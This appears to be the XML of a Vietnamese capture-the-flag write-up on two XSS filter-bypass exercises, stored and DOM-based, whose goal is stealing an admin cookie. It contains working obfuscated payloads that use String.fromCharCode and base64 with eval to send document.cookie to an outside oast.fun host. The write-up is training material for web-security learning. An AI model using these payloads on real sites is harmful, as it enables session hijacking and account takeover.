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258D" w14:textId="4EC578A8" w:rsidR="002F49FE" w:rsidRDefault="00B712C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B712C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: XSS Stored- filter bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B293B6" w14:textId="45D955F4" w:rsidR="00B712C1" w:rsidRDefault="00B712C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC34B41" w14:textId="4C070E54" w:rsidR="00B712C1" w:rsidRDefault="00B712C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Mục tiêu của bài này là lấy cookie của quản trị. (rất khó nha)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD7EC9" w14:textId="11B5CFCC" w:rsidR="00B712C1" w:rsidRDefault="00B712C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F1725F" w14:textId="4EA5F0EA" w:rsidR="00B712C1" w:rsidRDefault="00FD02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Có 2 input kẻ tấn công kiểm soát được là title, message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F181095" w14:textId="6940FA38" w:rsidR="00FD02EB" w:rsidRDefault="00FD02EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCC2B3A" w14:textId="5F835B11" w:rsidR="00FD02EB" w:rsidRDefault="00FD02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Mình fuzz thử thì thấy title chỉ cho phép những kí tự có thể in được, chặn &lt;,&gt;,”,’,/,\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49790F" w14:textId="16B62525" w:rsidR="00FD02EB" w:rsidRDefault="00FD02EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BBB71C" w14:textId="153C14A7" w:rsidR="00FD02EB" w:rsidRDefault="00FD02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Còn message chỉ chặn một số thẻ như img, script,… nên có thể khai thác XSS được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9AE0BE" w14:textId="72AC800F" w:rsidR="00FD02EB" w:rsidRDefault="00FD02EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DC7762" w14:textId="39865BC8" w:rsidR="00FD02EB" w:rsidRDefault="00AD2ED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Đầu tiên, mình sẽ tìm cách alert()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BC937" w14:textId="11E340B7" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5636582A" w14:textId="4AD395FC" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED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Mình bruteforce những thẻ, thuộc tính cho phép thì thấy button, onfocus có thể dùng được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DBE9D" w14:textId="1FF64D40" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FE5D47" w14:textId="021C4497" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED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Nó chặn 1 số hàm nguy hiểm như alert(), eval(), setTimeout() luôn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11800C02" w14:textId="78595037" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15673443" w14:textId="53D430A1" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED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Nhưng có rất nhiều cách để alert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A6263" w14:textId="77777777" w:rsidR="00385F57" w:rsidRDefault="00385F57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDAA626" w14:textId="554F09C6" w:rsidR="00AD2ED9" w:rsidRDefault="00AD2ED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Vd: </w:t>
      </w:r>
      <w:r w:rsidR="00385F57" w:rsidRPr="00385F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>window['alert']</w:t>
      </w:r>
      <w:r w:rsidR="00385F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD6346B" w14:textId="77777777" w:rsidR="00385F57" w:rsidRDefault="00385F57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54684C45" w14:textId="76A5B9BF" w:rsidR="00385F57" w:rsidRDefault="00385F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Nó chặn dấu ‘,” thì các bạn có thể dùng String.fromCharCode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3BC29" w14:textId="2BE660C4" w:rsidR="00385F57" w:rsidRDefault="00385F57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401AF9F2" w14:textId="480E07A1" w:rsidR="00385F57" w:rsidRDefault="00385F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 là:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00385F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;button autofoc</w:t>
      </w:r>
      <w:r w:rsidR="00A16B38">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="00385F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> onfocus=window[String.fromCharCode(97,108,101,114,116)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00385F57">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;a&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D477E22" w14:textId="1ABEC59B" w:rsidR="00A16B38" w:rsidRDefault="00A16B38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AF8A53" w14:textId="5862B30D" w:rsidR="00A16B38" w:rsidRDefault="00A16B3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Bước tiếp theo, mình sẽ chuyển hướng đến trang web khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7BD356" w14:textId="72676D5F" w:rsidR="00A16B38" w:rsidRDefault="00A16B38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DBBB45" w14:textId="45BE108F" w:rsidR="00A16B38" w:rsidRDefault="00A16B3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Nó chặn document.location,cookie rồi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E1B3D" w14:textId="11B7AC1C" w:rsidR="00A16B38" w:rsidRDefault="00A16B38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E526372" w14:textId="40AE121A" w:rsidR="00A16B38" w:rsidRDefault="00A16B3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Mình sẽ dùng location.assign()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286290E7" w14:textId="3585154E" w:rsidR="00B712C1" w:rsidRDefault="00B712C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3763F2C4" w14:textId="5E21F878" w:rsidR="00A16B38" w:rsidRDefault="00A16B3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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A16B38">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;button autofocus onfocus=location.assign(String.fromCharCode(104,116,116,112,58,47,47,99,101,54,112,104,110,101,50,118,116,99,48,48,48,48,52,115,112,113,48,103,56,100,109,101,52,119,121,121,121,121,121,98,46,111,97,115,116,46,102,117,110,47))&gt;a&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58460376" w14:textId="10FFA6FA" w:rsidR="00A16B38" w:rsidRDefault="00A16B38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB587E2" w14:textId="0C6D38D9" w:rsidR="00A16B38" w:rsidRDefault="00A16B3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Bạn tránh để payload quá dài nha vì nó sẽ không thực thi code được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552AA536" w14:textId="6010F44A" w:rsidR="00A16B38" w:rsidRDefault="00A16B38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05789566" w14:textId="39C8CA32" w:rsidR="00A16B38" w:rsidRDefault="00E353F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Vì document.cookie không dùng được nên mình xài document[’cookie’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6701BB33" w14:textId="487787F7" w:rsidR="00E353F2" w:rsidRDefault="00E353F2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA7F2E9" w14:textId="52AE26F7" w:rsidR="00E353F2" w:rsidRDefault="00E353F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Payload cuối cùng là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19A56C" w14:textId="23E926CE" w:rsidR="00E353F2" w:rsidRPr="00B712C1" w:rsidRDefault="00E353F2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E353F2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;button autofocus onfocus=location.assign(String.fromCharCode(104,116,116,112,58,47,47,99,101,54,112,104,110,101,50,118,116,99,48,48,48,48,52,115,112,113,48,103,56,100,109,101,52,119,121,121,121,121,121,98,46,111,97,115,116,46,102,117,110,47)+document[String.fromCharCode(99,111,111,107,105,101)])&gt;a&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B583C7" w14:textId="428275AB" w:rsidR="00B712C1" w:rsidRDefault="00B712C1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BDCE6F3" w14:textId="1EDF9DF6" w:rsidR="00E353F2" w:rsidRDefault="00E353F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E353F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBB39F" w14:textId="52E698A7" w:rsidR="00E353F2" w:rsidRDefault="00E353F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEDC5AE" w14:textId="67089BD0" w:rsidR="00B712C1" w:rsidRDefault="00E353F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Đợi 1 lúc, mình sẽ nhận được cookie của admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E56CC" w14:textId="6864C0F3" w:rsidR="00E353F2" w:rsidRDefault="00E353F2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4B193E" w14:textId="0D749AB9" w:rsidR="00E353F2" w:rsidRDefault="00E353F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Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E353F2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qa26f3ugb5tqv7o0mbvtv414u8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D605F48" w14:textId="05343037" w:rsidR="00C961A8" w:rsidRDefault="00C961A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2A6667" w14:textId="76331F88" w:rsidR="00C961A8" w:rsidRDefault="00C961A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C961A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 2: XSS Dom based- filter bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DA67C" w14:textId="17F8A31D" w:rsidR="00C961A8" w:rsidRDefault="00C961A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38964EA0" w14:textId="08D9B960" w:rsidR="00C961A8" w:rsidRDefault="00C961A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Mục tiêu của bài này là lấy cookie của quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A94F8C" w14:textId="315D8620" w:rsidR="00C961A8" w:rsidRDefault="00C961A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEF526A" w14:textId="532199EA" w:rsidR="00C961A8" w:rsidRDefault="00C961A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Cũng giống mấy bài trước, lỗ hổng XSS</w:t>
      </w:r>
      <w:r w:rsidR="00E00AE6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nằm ở phần main.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A8338" w14:textId="5328D3AF" w:rsidR="00E00AE6" w:rsidRDefault="00E00AE6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604DC055" w14:textId="4D0A3106" w:rsidR="00E00AE6" w:rsidRDefault="00E00AE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Cùng tìm hiểu xem nó lọc những gì nào??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B079C3B" w14:textId="0E01503D" w:rsidR="00E00AE6" w:rsidRDefault="00E00AE6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636FEE9A" w14:textId="75FFED43" w:rsidR="00E00AE6" w:rsidRDefault="00E00AE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Nó chặn </w:t>
      </w:r>
      <w:r w:rsidR="002605AF" w:rsidRPr="002605AF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>",;</w:t>
      </w:r>
      <w:r w:rsidR="00F70359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,+</w:t>
      </w:r>
      <w:r w:rsidR="002605AF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và cho phép </w:t>
      </w:r>
      <w:r w:rsidR="002605AF" w:rsidRPr="002605AF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/,.,(,),'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F6A2BF" w14:textId="04CE217A" w:rsidR="002605AF" w:rsidRDefault="002605AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E6FF9D" w14:textId="702D61D5" w:rsidR="002605AF" w:rsidRDefault="002605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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00182035">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'-alert(1)-'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002605AF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alert thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F24B0" w14:textId="17FF349A" w:rsidR="00F70359" w:rsidRDefault="00F70359">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3491C86B" w14:textId="7E00610A" w:rsidR="00F70359" w:rsidRDefault="00F7035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Nhưng khi redirect nó chặn http:// </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F70359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Are you trying a redirect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97AA53" w14:textId="286E2F5C" w:rsidR="00F70359" w:rsidRDefault="00F70359">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE39E4A" w14:textId="77777777" w:rsidR="00F70359" w:rsidRDefault="00F70359" w:rsidP="00F70359">
      <w:pPr>
        <w:ind w:left="-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Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BA3FB" w14:textId="58668213" w:rsidR="00F70359" w:rsidRDefault="00F70359" w:rsidP="00F70359">
      <w:pPr>
        <w:ind w:left="-284"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B515801" w14:textId="4AA9C254" w:rsidR="00182035" w:rsidRPr="00182035" w:rsidRDefault="00182035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182035">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'-eval(atob('bG9jYXRpb24uYXNzaWduKCdodHRwOi8vY2U2cGhuZTJ2dGMwMDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775220D7" w14:textId="5ABDBAA8" w:rsidR="002605AF" w:rsidRDefault="00182035">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00182035">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wNHNwcTBnOGRtZTR3eXl5eXliLm9hc3QuZnVuLz9jPScuY29uY2F0KGRvY3VtZW50LmNvb2tpZSkp'))-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEB711" w14:textId="38B1E091" w:rsidR="00182035" w:rsidRDefault="00182035">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF3B1AD" w14:textId="5347956E" w:rsidR="00182035" w:rsidRDefault="00182035" w:rsidP="00182035">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00182035">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bG9jYXRpb24uYXNzaWduKCdodHRwOi8vY2U2cGhuZTJ2dGMwMDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B00E8E7" w14:textId="48034769" w:rsidR="00182035" w:rsidRDefault="00182035" w:rsidP="00182035">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00182035">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wNHNwcTBnOGRtZTR3eXl5eXliLm9hc3QuZnVuLz9jPScuY29uY2F0KGRvY3VtZW50LmNvb2tpZSkp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7706B" w14:textId="24009A94" w:rsidR="00182035" w:rsidRDefault="00182035" w:rsidP="00182035">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4636F436" w14:textId="2AFAE576" w:rsidR="00182035" w:rsidRDefault="00182035" w:rsidP="00182035">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00182035">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location.assign('http://ce6phne2vtc00004spq0g8dme4wyyyyyb.oast.fun/?c='.concat(document.cookie))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A0673" w14:textId="18E5D85F" w:rsidR="002605AF" w:rsidRDefault="002605AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
